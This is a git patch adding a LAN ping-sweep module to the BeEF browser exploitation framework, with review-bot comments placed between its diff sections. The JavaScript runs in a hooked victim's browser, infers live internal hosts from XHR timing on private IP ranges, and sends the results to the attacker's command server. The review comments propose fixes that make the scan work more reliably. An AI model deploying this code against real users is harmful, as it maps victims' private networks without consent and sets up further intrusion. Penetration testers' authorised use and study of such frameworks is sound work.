From 624d81749ed8eb9b612a7d08dffd86db9103d3db Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Sun, 17 Apr 2016 14:07:55 +0000
Subject: [PATCH] Add Ping Sweep module
---
 arerules/lan_ping_sweep.json | 25 ++++++
 arerules/lan_ping_sweep_common.json | 20 +++++
 modules/network/ping_sweep/command.js | 108 +++++++++++++++++++++++++
 modules/network/ping_sweep/config.yaml | 16 ++++
 modules/network/ping_sweep/module.rb | 38 +++++++++
 5 files changed, 207 insertions(+)
 create mode 100644 arerules/lan_ping_sweep.json
 create mode 100644 arerules/lan_ping_sweep_common.json
 create mode 100644 modules/network/ping_sweep/command.js
 create mode 100644 modules/network/ping_sweep/config.yaml
 create mode 100644 modules/network/ping_sweep/module.rb
diff --git a/arerules/lan_ping_sweep.json b/arerules/lan_ping_sweep.json
new file mode 100644
index 000000000..a89ce7def
--- /dev/null
+++ b/arerules/lan_ping_sweep.json
@@ -0,0 +1,25 @@
+{"name": "LAN Ping Sweep",
+ "author": "bcoles",
+ "browser": "FF",
+ "browser_version": "ALL",
+ "os": "ALL",
+ "os_version": "ALL",
+ "modules": [
+ {"name": "get_internal_ip_webrtc",
+ "condition": null,
+ "code": null,
+ "options": {}
+ },
+ {"name": "ping_sweep",
+ "condition": "status==1",
+ "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;",
+ "options": {
+ "rhosts":"<>",
+ "threads":"3"
+ }
+ }
+ ],
+ "execution_order": [0, 1],
+ "execution_delay": [0, 0],
+ "chain_mode": "nested-forward"
+}
diff --git a/arerules/lan_ping_sweep_common.json b/arerules/lan_ping_sweep_common.json
new file mode 100644
index 000000000..3702ecbb7
--- /dev/null
+++ b/arerules/lan_ping_sweep_common.json
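Review bot: The `code` for the `ping_sweep` step builds the /24 from `get_internal_ip_webrtc_mod_output.split('.')` without checking that the output is a single dotted-quad; the `status==1` condition only establishes that the WebRTC module succeeded. What that module emits when the browser exposes several local addresses, or only an IPv6 one, is not visible in this patch, but in either case `s[0]+'.'+s[1]+'.'+s[2]` yields a malformed range that the ping_sweep module will reject. A guard in the rule makes that failure explicit instead of silent, e.g. `var m = get_internal_ip_webrtc_mod_output.match(/^(\d+\.\d+\.\d+)\.\d+$/); var mod_input = m ? m[1]+'.1-'+m[1]+'.255' : '';` (with the backslashes doubled inside the JSON string).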
@@ -0,0 +1,20 @@
+{"name": "LAN Ping Sweep (Common IPs)",
+ "author": "bcoles",
+ "browser": "FF",
+ "browser_version": "ALL",
+ "os": "ALL",
+ "os_version": "ALL",
+ "modules": [
+ {"name": "ping_sweep",
+ "condition": null,
+ "code": null,
+ "options": {
+ "rhosts":"common",
+ "threads":"3"
+ }
+ }
+ ],
+ "execution_order": [0],
+ "execution_delay": [0],
+ "chain_mode": "sequential"
+}
diff --git a/modules/network/ping_sweep/command.js b/modules/network/ping_sweep/command.js
new file mode 100644
index 000000000..78cea7726
--- /dev/null
+++ b/modules/network/ping_sweep/command.js
@@ -0,0 +1,108 @@
+//
+// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var ips = new Array();
+ var rhosts = "<%= @rhosts %>";
+ var threads = parseInt("<%= @threads %>", 10) || 3;
+ var timeout = 1000;
+
+ if(!beef.browser.hasCors()) {
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.are.status_error());
+ return;
+ }
+
+ // set target IP addresses
+ if (rhosts == 'common') {
+ // use default IPs
+ ips = [
+ '192.168.0.1',
+ '192.168.0.100',
+ '192.168.0.254',
+ '192.168.1.1',
+ '192.168.1.100',
+ '192.168.1.254',
+ '10.0.0.1',
+ '10.1.1.1',
+ '192.168.2.1',
+ '192.168.2.254',
+ '192.168.100.1',
+ '192.168.100.254',
+ '192.168.123.1',
+ '192.168.123.254',
+ '192.168.10.1',
+ '192.168.10.254'
+ ];
+ } else {
+ // set target IP range
+ var range = rhosts.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$');
+ if (range == null || range[1] == null) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error());
+ return;
+ }
+ ipBounds = rhosts.split('-');
+ lowerBound = ipBounds[0].split('.')[3];
+ upperBound = ipBounds[1].split('.')[3];
+ for (var i = lowerBound; i <= upperBound; i++){
+ ipToTest = ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
+ ips.push(ipToTest);
+ }
+ }
+
+ WorkerQueue = function(frequency) {
+
+ var stack = [];
+ var timer = null;
+ var frequency = frequency;
+ var start_scan = (new Date).getTime();
+
+ this.process = function() {
+ var item = stack.shift();
+ eval(item);
+ if (stack.length === 0) {
+ clearInterval(timer);
+ timer = null;
+ var interval = (new Date).getTime() - start_scan;
+ beef.debug("[Ping Sweep] Worker queue is complete ["+interval+" ms]");
+ return;
+ }
+ }
+
+ this.queue = function(item) {
+ stack.push(item);
+ if (timer === null) timer = setInterval(this.process, frequency);
+ }
+
+ }
+
+ // create workers
+ var workers = new Array();
+ for (w=0; w < threads; w++) workers.push(new WorkerQueue(timeout));
+
+ beef.debug("[Ping Sweep] Starting scan ("+(ips.length)+" URLs / "+threads+" workers)");
+ for (var i=0; i < ips.length; i++) {
+ var worker = workers[i % threads];
+ var ip = ips[i];
+ // use a high port likely to be closed/filtered (60000 - 65000)
+ var port = Math.floor(Math.random() * 5000) + 60000;
+ worker.queue('var start_time = new Date().getTime();' +
+ 'beef.net.cors.request(' +
+ '"GET", "http://'+ip+':'+port+'/", "", '+timeout+', function(response) {' +
+ 'var current_time = new Date().getTime();' +
+ 'var duration = current_time - start_time;' +
+ 'if (duration < '+timeout+') {' +
+ 'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- host is up");' +
+ 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip='+ip+'&ping="+duration+"ms", beef.are.status_success());' +
+ '} else {' +
+ 'beef.debug("[Ping Sweep] '+ip+' [" + duration + " ms] -- timeout");' +
+ '}' +
+ '});'
+ );
+ }
+
+});
+
diff --git a/modules/network/ping_sweep/config.yaml b/modules/network/ping_sweep/config.yaml
new file mode 100644
index 000000000..e3613f8fb
--- /dev/null
+++ b/modules/network/ping_sweep/config.yaml
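Review bot: The range validation in the `else` branch hands its pattern to `match` as a string literal, so the `\.` and `\-` escapes are consumed by the string parser before the RegExp is built and every dot position matches any character; use a RegExp literal (`/^(...)\.(...)\.(...)\.(...)-(...)$/`) or double the backslashes (`\\.`, `\\-`) so only dotted-quad ranges get through to the `eval`'d request strings. The bounds are then compared as strings: `lowerBound` and `upperBound` come straight from `split('.')[3]`, so `i <= upperBound` is a lexicographic compare on the first iteration and a range ending `.9-….10` scans nothing while `.100-….99` scans one host past the end; `lowerBound = parseInt(ipBounds[0].split('.')[3], 10);` and `upperBound = parseInt(ipBounds[1].split('.')[3], 10);` fix that. `ipBounds`, `lowerBound`, `upperBound`, `ipToTest`, `WorkerQueue` and the loop counter `w` are also assigned without `var` and so leak into the hooked page's global scope.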
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ ping_sweep:
+ enable: true
+ category: "Network"
+ name: "Ping Sweep"
+ description: "Discover active hosts in the internal network of the hooked browser using JavaScript XHR.

Note: set the IP address range to 'common' to scan a list of common LAN addresses."
+ authors: ["bcoles"]
+ target:
+ working: ["FF"]
+ not_working: ["ALL"]
diff --git a/modules/network/ping_sweep/module.rb b/modules/network/ping_sweep/module.rb
new file mode 100644
index 000000000..d2a26ed1d
--- /dev/null
+++ b/modules/network/ping_sweep/module.rb
@@ -0,0 +1,38 @@
+#
+# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Ping_sweep < BeEF::Core::Command
+
+ def post_execute
+ content = {}
+ content['result'] = @datastore['result']
+ save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+
+ session_id = @datastore['beefhook']
+
+ # log the network service
+ if @datastore['results'] =~ /^ip=(.+)&ping=(\d+)ms$/
+ ip = $1
+ ping = $2
+ if BeEF::Filters.is_valid_ip?(ip)
+ print_debug("Hooked browser found host #{ip}")
+ BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => ip)
+ end
+ end
+ end
+
+ end
+
+ def self.options
+ return [
+ {'name' => 'rhosts', 'ui_label' => 'Scan IP range (C class)', 'value' => 'common' },
+ {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '3'}
+ ]
+ end
+
+end
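Review bot: The `description` does not say what "active" means or how the range is interpreted, and an operator reading only the module UI will assume an ICMP ping and an arbitrary range. Per command.js in this same patch a host is reported up when a cross-origin XHR to a random port in 60000-64999 completes within the 1000 ms timeout, and only the last octet of the range end is honoured (the UI label says "C class"). Suggest appending to the description: `Hosts are reported up when an XHR to a random high port completes within 1 second (a timing heuristic, not ICMP). Ranges are limited to a single /24: only the last octet of the end address is used. Requires CORS support in the hooked browser.`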
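Review bot: `ping = $2` in `post_execute` is captured but never used, so the round-trip time the JavaScript reports is dropped right after the regex; either surface it (e.g. `print_debug("Hooked browser found host #{ip} (#{ping} ms)")`) or drop the assignment. The block also reads two different keys, `@datastore['result']` for `save content` and `@datastore['results']` for the network log; whether the command handler populates both cannot be seen in this patch, so confirm one of them is not always nil before merging. The `BeEF::Filters.is_valid_ip?` check before `NetworkHost.add` is in the right place, since `ip` originates in the hooked browser and must not reach the model unvalidated.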